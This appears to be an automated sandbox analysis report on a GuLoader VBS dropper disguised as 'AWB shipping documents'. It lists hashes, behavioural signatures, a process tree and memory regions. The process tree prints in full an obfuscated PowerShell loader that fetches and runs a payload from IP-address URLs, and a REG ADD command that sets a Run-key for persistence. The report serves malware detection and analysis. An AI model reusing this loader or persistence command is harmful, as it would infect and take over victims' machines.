Analysis

  • max time kernel
    160s
  • max time network
    162s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/03/2024, 13:15

General

  • Target

    awb_shipping_documents_25_03_2024_000000000.vbs

  • Size

    237KB

  • MD5

    937285e67679dcbd6d3a218cff5723e4

  • SHA1

    73023fa293fc84f1db845a75a4be3c2337c8da4d

  • SHA256

    d90f3ab705edef2a59cc39b6269f1a149f0f6e43e0aa4f128d05c1697726bcdb

  • SHA512

    607ea5c0cf19a5776d60c15942c28b5e9433e52f72abad0b250d7abb72f98721210d328c6915051cd9b2fa215a938ed64eebb20de3dc6b9511f2a2fa3cb1b773

  • SSDEEP

    6144:lyhQMLtOBxJrv5lttSP4KuK8jWwoipSRUiGT9rS2fTicm7jImE9uAI:ekVBDjI

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_documents_25_03_2024_000000000.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3768
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patchy Corporis Vergaloo #>;<#sndagsskolers Paws Alexandrite Skit #>;New-Item -Path 'reservats:\Forfaldt' -Name 'Tiptipoldemoders' -ItemType 'file';<#Conto Perty Rkefjolss blencorn Vitrinernes #>;Function Tulipa ([String]$superofficiously){$Urikonografi = 2;For($Uri=1; $Uri -lt $superofficiously.Length-1; $Uri+=$Urikonografi){ $Urstrukturens = $superofficiously.Substring($Uri, $Forkhead); $Distingverende80=$Distingverende80+$Urstrukturens; }$Distingverende80;}$Forkhead = (cmd /c 'echo 1 && exit');if (Test-Path 'reservats:\Forfaldt\Tiptipoldemoders') {$Forkhead--};$Agillawood224=Tulipa ' i,eRxE ';$Outfound=Tulipa '.TSr a n,s fVeSr,rDi,nDg, ';$Monochordist = Tulipa 'A\Ss yDs wUoJw 6S4H\FW i.n,dHoFw,s PBo,wFePrPSFh,eTl l \Gv 1,. 0K\SpdoAwse,r.sKhue l.lB. e xVe. ';function Forefather ($Firetages){. ($Agillawood224) ($Firetages);}$Strangler=Tulipa '.hPtPtApR: /./V1 4.7D.r7P8.. 1 0h3U.A2 5 0R/ S pUr r eUr eNg e lo. pRsPdB>shGtStOp.: /P/I8.5,.F2 0r9 . 1S7,6M.O4.6,/GSTpCr.r e rSe g,eSl .Sp s.dS ';$Formbrndselsfabrikken236=$Strangler.split([char]62);$Strangler=$Formbrndselsfabrikken236[0];Forefather (Tulipa ' $CgPlSo.bDaBld:BF y sHi,oJt eSrBaGp,eSu.tEsDk oWlRe r =K$AeRnUv.: wTiUntdFiEr ') ;Forefather (Tulipa ' $ g l.opbTa l.:BL,eHvHiSnRe r = $ F yAsHi oRtne rSa,pLeFuPt s kUoMl eFr.+ $AM o n,o cDh,o r dLi s tN ') ;Forefather (Tulipa 'T$ gUlNo b afl :RHPaSa nAd.vArSkNe tEs .=A ,( (Kg wAm iS w iDnU3 2,_,p r.o.c eMs s. -,F. P,rSoZcNeGs s I d =D$,{PP IKD,} )A. C o m m aHn d.L,i n e.). .- s,p lMi t. b[.cPh aJr ] 3B4E ');Forefather (Tulipa ' $ g.lFoCb.a,lg: R dUtA1I8.5D .=, T$AH.aSa n d v r.k e t s [ $ H,aOaSn dLvGrBkEeTt s .FcBo,u.nEtV-M2S] ');Forefather (Tulipa 'A$tgPlRo b,a.l.: OHvhe.rVb eAf oAl k nMiSnSg.eSn,s = (,TOe s t - P,aTt hB .$ L.eVvUifnBe rM) F- AAn dT T(.[ I nst PDtAr ] :P: sKiKzOe M- eEqF 8E) ') ;if ($Overbefolkningens) {& $Leviner $Rdt185;} else {;$Genealogists=Tulipa 'A$ g,l,oTbNa l : M.iGn,i,f iseTdJ ,= ,SAt.a r tS-PB iLtAseTarSa nRs f eNr. -NSToFu r,c e, G$ISOt r a n g,lUe r. -DDSeBs t iknSa tvi.oLn, O$ FEyMs i o t.e,rRaep.eOuPtSs.k,o.l.e.rB ';Forefather (Tulipa '.$Ag lVo b.aTlM: FLySsfiToIt e,rMaFp,eSu.tOsBkRoklbeMr = $,eonKv :Sa pCp d aSt aE ') ;Forefather (Tulipa '.I mMpOowrOtT-.M o dTuAl.e, BEiStEs,T rMa n s f e.rG ') ;$Fysioterapeutskoler=$Fysioterapeutskoler+'\Judicial.Ara' ;Forefather (Tulipa ',$,g l.o b,a lA:ICThDoUl eSlTiItAh.odt.o.m yn= (ST,e sEtN-,P.aGt hS ,$VF,ySsUi,oRt,eAr a.pVeSuNtesTkBo,l e r ), ') ;while (-not $Cholelithotomy) {Forefather (Tulipa ' IAf ( $TM i.n.i fPi eBdK.DJ opbAS.t.aDt ei -Re qH ,$.OWu tNf o u,n d.)F K{YS.tPa,r.tc- SClDeBeVp M1C} etlAs.eN{SSOt a,r tf-NS l eFe pB 1S;TFSoSrBe f aPt h,e.rP ,$.GBeEn.e a lKo g i sot sA}D ');Forefather (Tulipa 'F$Eg.lHokb.a lP:aC hHo,l eMl iVtKhSo tSoRm y = (,T,e s t.-.P aNt,hM K$ FNy,s i ovt eTr.a.pCe u t s k oBlKe r )S ') ;$Strangler=$Formbrndselsfabrikken236[$Precompiler++%$Formbrndselsfabrikken236.count];}Forefather (Tulipa '.$Ggal o,bSaOlA:UP aDsFs.a gHe.r eCrPnRe.sN t=D TGNeAtT-BC o nutUeQn.tD D$,FAy,s iSo.t,e r alpFeRuEtSs.k oIl,eNr ');Forefather (Tulipa 'K$Hg lDo.bBaPlN:DD.uGr o mOeLtHe,rRs = [.S yVsStPe m,. C,o nBv e rDt.]D:R: F ruo,m BPaKs e,6O4DSPtLrSiNnFg (J$ P aGsTs a.gteUr eBr.n e s,) ');Forefather (Tulipa 'I$,g lWo bBaOl.:,V.aSlCm.u.eB S=f S[.SRyFs t eUmB.,TSe x tK. E nFcuo,d iHnKg ].:P:UAPSTC.IVIS.,G.eSt.SFtTr i,n.g (.$ DHu,r.o.m eHtReDrKs )H ');Forefather (Tulipa ' $ g l.o,bPaAl,:SCueNp.h a.l o,cHhCoSr dEaS=A$,V a.lEm,uSe,.Ps,u b,s tUrHiFnKg (.2E9R1I1M8L6S, 2 3K4S0E0C)S ');Forefather $Cephalochorda;};;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1188
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo 1 && exit"
        3⤵
          PID:4512
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Patchy Corporis Vergaloo #>;<#sndagsskolers Paws Alexandrite Skit #>;New-Item -Path 'reservats:\Forfaldt' -Name 'Tiptipoldemoders' -ItemType 'file';<#Conto Perty Rkefjolss blencorn Vitrinernes #>;Function Tulipa ([String]$superofficiously){$Urikonografi = 2;For($Uri=1; $Uri -lt $superofficiously.Length-1; $Uri+=$Urikonografi){ $Urstrukturens = $superofficiously.Substring($Uri, $Forkhead); $Distingverende80=$Distingverende80+$Urstrukturens; }$Distingverende80;}$Forkhead = (cmd /c 'echo 1 && exit');if (Test-Path 'reservats:\Forfaldt\Tiptipoldemoders') {$Forkhead--};$Agillawood224=Tulipa ' i,eRxE ';$Outfound=Tulipa '.TSr a n,s fVeSr,rDi,nDg, ';$Monochordist = Tulipa 'A\Ss yDs wUoJw 6S4H\FW i.n,dHoFw,s PBo,wFePrPSFh,eTl l \Gv 1,. 0K\SpdoAwse,r.sKhue l.lB. e xVe. ';function Forefather ($Firetages){. ($Agillawood224) ($Firetages);}$Strangler=Tulipa '.hPtPtApR: /./V1 4.7D.r7P8.. 1 0h3U.A2 5 0R/ S pUr r eUr eNg e lo. pRsPdB>shGtStOp.: /P/I8.5,.F2 0r9 . 1S7,6M.O4.6,/GSTpCr.r e rSe g,eSl .Sp s.dS ';$Formbrndselsfabrikken236=$Strangler.split([char]62);$Strangler=$Formbrndselsfabrikken236[0];Forefather (Tulipa ' $CgPlSo.bDaBld:BF y sHi,oJt eSrBaGp,eSu.tEsDk oWlRe r =K$AeRnUv.: wTiUntdFiEr ') ;Forefather (Tulipa ' $ g l.opbTa l.:BL,eHvHiSnRe r = $ F yAsHi oRtne rSa,pLeFuPt s kUoMl eFr.+ $AM o n,o cDh,o r dLi s tN ') ;Forefather (Tulipa 'T$ gUlNo b afl :RHPaSa nAd.vArSkNe tEs .=A ,( (Kg wAm iS w iDnU3 2,_,p r.o.c eMs s. -,F. P,rSoZcNeGs s I d =D$,{PP IKD,} )A. C o m m aHn d.L,i n e.). .- s,p lMi t. b[.cPh aJr ] 3B4E ');Forefather (Tulipa ' $ g.lFoCb.a,lg: R dUtA1I8.5D .=, T$AH.aSa n d v r.k e t s [ $ H,aOaSn dLvGrBkEeTt s .FcBo,u.nEtV-M2S] ');Forefather (Tulipa 'A$tgPlRo b,a.l.: OHvhe.rVb eAf oAl k nMiSnSg.eSn,s = (,TOe s t - P,aTt hB .$ L.eVvUifnBe rM) F- AAn dT T(.[ I nst PDtAr ] :P: sKiKzOe M- eEqF 8E) ') ;if ($Overbefolkningens) {& $Leviner $Rdt185;} else {;$Genealogists=Tulipa 'A$ g,l,oTbNa l : M.iGn,i,f iseTdJ ,= ,SAt.a r tS-PB iLtAseTarSa nRs f eNr. -NSToFu r,c e, G$ISOt r a n g,lUe r. -DDSeBs t iknSa tvi.oLn, O$ FEyMs i o t.e,rRaep.eOuPtSs.k,o.l.e.rB ';Forefather (Tulipa '.$Ag lVo b.aTlM: FLySsfiToIt e,rMaFp,eSu.tOsBkRoklbeMr = $,eonKv :Sa pCp d aSt aE ') ;Forefather (Tulipa '.I mMpOowrOtT-.M o dTuAl.e, BEiStEs,T rMa n s f e.rG ') ;$Fysioterapeutskoler=$Fysioterapeutskoler+'\Judicial.Ara' ;Forefather (Tulipa ',$,g l.o b,a lA:ICThDoUl eSlTiItAh.odt.o.m yn= (ST,e sEtN-,P.aGt hS ,$VF,ySsUi,oRt,eAr a.pVeSuNtesTkBo,l e r ), ') ;while (-not $Cholelithotomy) {Forefather (Tulipa ' IAf ( $TM i.n.i fPi eBdK.DJ opbAS.t.aDt ei -Re qH ,$.OWu tNf o u,n d.)F K{YS.tPa,r.tc- SClDeBeVp M1C} etlAs.eN{SSOt a,r tf-NS l eFe pB 1S;TFSoSrBe f aPt h,e.rP ,$.GBeEn.e a lKo g i sot sA}D ');Forefather (Tulipa 'F$Eg.lHokb.a lP:aC hHo,l eMl iVtKhSo tSoRm y = (,T,e s t.-.P aNt,hM K$ FNy,s i ovt eTr.a.pCe u t s k oBlKe r )S ') ;$Strangler=$Formbrndselsfabrikken236[$Precompiler++%$Formbrndselsfabrikken236.count];}Forefather (Tulipa '.$Ggal o,bSaOlA:UP aDsFs.a gHe.r eCrPnRe.sN t=D TGNeAtT-BC o nutUeQn.tD D$,FAy,s iSo.t,e r alpFeRuEtSs.k oIl,eNr ');Forefather (Tulipa 'K$Hg lDo.bBaPlN:DD.uGr o mOeLtHe,rRs = [.S yVsStPe m,. C,o nBv e rDt.]D:R: F ruo,m BPaKs e,6O4DSPtLrSiNnFg (J$ P aGsTs a.gteUr eBr.n e s,) ');Forefather (Tulipa 'I$,g lWo bBaOl.:,V.aSlCm.u.eB S=f S[.SRyFs t eUmB.,TSe x tK. E nFcuo,d iHnKg ].:P:UAPSTC.IVIS.,G.eSt.SFtTr i,n.g (.$ DHu,r.o.m eHtReDrKs )H ');Forefather (Tulipa ' $ g l.o,bPaAl,:SCueNp.h a.l o,cHhCoSr dEaS=A$,V a.lEm,uSe,.Ps,u b,s tUrHiFnKg (.2E9R1I1M8L6S, 2 3K4S0E0C)S ');Forefather $Cephalochorda;};;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2648
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo 1 && exit"
            4⤵
              PID:4296
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:3620
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epizoa213" /t REG_EXPAND_SZ /d "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\antimakassar\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:184
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epizoa213" /t REG_EXPAND_SZ /d "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\antimakassar\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:1392
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4068 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:8
        1⤵
          PID:3836

        Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_klf3aukr.vqi.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • memory/1188-7-0x00000257C8E50000-0x00000257C8E72000-memory.dmp

                Filesize

                136KB

              • memory/1188-12-0x00007FFFD4E60000-0x00007FFFD5921000-memory.dmp

                Filesize

                10.8MB

              • memory/1188-13-0x00000257C8E80000-0x00000257C8E90000-memory.dmp

                Filesize

                64KB

              • memory/1188-14-0x00000257C8E80000-0x00000257C8E90000-memory.dmp

                Filesize

                64KB

              • memory/1188-15-0x00000257C8E80000-0x00000257C8E90000-memory.dmp

                Filesize

                64KB

              • memory/1188-33-0x00007FFFD4E60000-0x00007FFFD5921000-memory.dmp

                Filesize

                10.8MB

              • memory/1188-34-0x00000257C8E80000-0x00000257C8E90000-memory.dmp

                Filesize

                64KB

              • memory/1188-35-0x00000257C8E80000-0x00000257C8E90000-memory.dmp

                Filesize

                64KB

              • memory/1188-72-0x00007FFFD4E60000-0x00007FFFD5921000-memory.dmp

                Filesize

                10.8MB

              • memory/2648-52-0x0000000009220000-0x000000000B214000-memory.dmp

                Filesize

                32.0MB

              • memory/2648-44-0x0000000008BA0000-0x000000000921A000-memory.dmp

                Filesize

                6.5MB

              • memory/2648-19-0x0000000005980000-0x0000000005FA8000-memory.dmp

                Filesize

                6.2MB

              • memory/2648-20-0x0000000005900000-0x0000000005922000-memory.dmp

                Filesize

                136KB

              • memory/2648-21-0x0000000006120000-0x0000000006186000-memory.dmp

                Filesize

                408KB

              • memory/2648-22-0x0000000006190000-0x00000000061F6000-memory.dmp

                Filesize

                408KB

              • memory/2648-28-0x00000000062C0000-0x0000000006614000-memory.dmp

                Filesize

                3.3MB

              • memory/2648-36-0x00000000068C0000-0x00000000068DE000-memory.dmp

                Filesize

                120KB

              • memory/2648-37-0x00000000069A0000-0x00000000069EC000-memory.dmp

                Filesize

                304KB

              • memory/2648-38-0x0000000074B50000-0x0000000075300000-memory.dmp

                Filesize

                7.7MB

              • memory/2648-39-0x0000000002FA0000-0x0000000002FB0000-memory.dmp

                Filesize

                64KB

              • memory/2648-40-0x0000000007920000-0x00000000079B6000-memory.dmp

                Filesize

                600KB

              • memory/2648-41-0x0000000006E50000-0x0000000006E6A000-memory.dmp

                Filesize

                104KB

              • memory/2648-42-0x0000000006EA0000-0x0000000006EC2000-memory.dmp

                Filesize

                136KB

              • memory/2648-43-0x0000000007F70000-0x0000000008514000-memory.dmp

                Filesize

                5.6MB

              • memory/2648-66-0x0000000009220000-0x000000000B214000-memory.dmp

                Filesize

                32.0MB

              • memory/2648-45-0x0000000002FA0000-0x0000000002FB0000-memory.dmp

                Filesize

                64KB

              • memory/2648-46-0x0000000007EC0000-0x0000000007EE2000-memory.dmp

                Filesize

                136KB

              • memory/2648-47-0x0000000007F30000-0x0000000007F44000-memory.dmp

                Filesize

                80KB

              • memory/2648-49-0x0000000002FA0000-0x0000000002FB0000-memory.dmp

                Filesize

                64KB

              • memory/2648-50-0x0000000002FA0000-0x0000000002FB0000-memory.dmp

                Filesize

                64KB

              • memory/2648-51-0x0000000008680000-0x0000000008681000-memory.dmp

                Filesize

                4KB

              • memory/2648-17-0x0000000002FA0000-0x0000000002FB0000-memory.dmp

                Filesize

                64KB

              • memory/2648-53-0x0000000009220000-0x000000000B214000-memory.dmp

                Filesize

                32.0MB

              • memory/2648-54-0x0000000002FA0000-0x0000000002FB0000-memory.dmp

                Filesize

                64KB

              • memory/2648-55-0x0000000009220000-0x000000000B214000-memory.dmp

                Filesize

                32.0MB

              • memory/2648-56-0x0000000077571000-0x0000000077691000-memory.dmp

                Filesize

                1.1MB

              • memory/2648-63-0x0000000074B50000-0x0000000075300000-memory.dmp

                Filesize

                7.7MB

              • memory/2648-16-0x0000000074B50000-0x0000000075300000-memory.dmp

                Filesize

                7.7MB

              • memory/2648-18-0x0000000005310000-0x0000000005346000-memory.dmp

                Filesize

                216KB

              • memory/3620-58-0x00000000775F8000-0x00000000775F9000-memory.dmp

                Filesize

                4KB

              • memory/3620-61-0x0000000001EF0000-0x0000000003EE4000-memory.dmp

                Filesize

                32.0MB

              • memory/3620-60-0x0000000001EF0000-0x0000000003EE4000-memory.dmp

                Filesize

                32.0MB

              • memory/3620-62-0x0000000077571000-0x0000000077691000-memory.dmp

                Filesize

                1.1MB

              • memory/3620-64-0x0000000000C90000-0x0000000001EE4000-memory.dmp

                Filesize

                18.3MB

              • memory/3620-65-0x0000000000C90000-0x0000000001EE4000-memory.dmp

                Filesize

                18.3MB

              • memory/3620-59-0x0000000077571000-0x0000000077691000-memory.dmp

                Filesize

                1.1MB

              • memory/3620-67-0x0000000000C90000-0x0000000001EE4000-memory.dmp

                Filesize

                18.3MB

              • memory/3620-68-0x0000000000C90000-0x0000000001EE4000-memory.dmp

                Filesize

                18.3MB

              • memory/3620-69-0x0000000000C90000-0x0000000001EE4000-memory.dmp

                Filesize

                18.3MB

              • memory/3620-73-0x0000000000C90000-0x0000000001EE4000-memory.dmp

                Filesize

                18.3MB

              • memory/3620-57-0x0000000001EF0000-0x0000000003EE4000-memory.dmp

                Filesize

                32.0MB

              • memory/3620-74-0x0000000000C90000-0x0000000001EE4000-memory.dmp

                Filesize

                18.3MB

              • memory/3620-75-0x0000000000C90000-0x0000000001EE4000-memory.dmp

                Filesize

                18.3MB

              • memory/3620-76-0x0000000000C90000-0x0000000001EE4000-memory.dmp

                Filesize

                18.3MB

              • memory/3620-77-0x0000000000C90000-0x0000000001EE4000-memory.dmp

                Filesize

                18.3MB

              • memory/3620-78-0x0000000000C90000-0x0000000001EE4000-memory.dmp

                Filesize

                18.3MB

              • memory/3620-79-0x0000000000C90000-0x0000000001EE4000-memory.dmp

                Filesize

                18.3MB

              • memory/3620-80-0x0000000000C90000-0x0000000001EE4000-memory.dmp

                Filesize

                18.3MB

              • memory/3620-81-0x0000000000C90000-0x0000000001EE4000-memory.dmp

                Filesize

                18.3MB

              • memory/3620-82-0x0000000000C90000-0x0000000001EE4000-memory.dmp

                Filesize

                18.3MB

              • memory/3620-83-0x0000000000C90000-0x0000000001EE4000-memory.dmp

                Filesize

                18.3MB

              • memory/3620-84-0x0000000000C90000-0x0000000001EE4000-memory.dmp

                Filesize

                18.3MB

              • memory/3620-88-0x0000000000C90000-0x0000000001EE4000-memory.dmp

                Filesize

                18.3MB

              • memory/3620-89-0x0000000000C90000-0x0000000001EE4000-memory.dmp

                Filesize

                18.3MB

              • memory/3620-90-0x0000000000C90000-0x0000000001EE4000-memory.dmp

                Filesize

                18.3MB

              • memory/3620-91-0x0000000000C90000-0x0000000001EE4000-memory.dmp

                Filesize

                18.3MB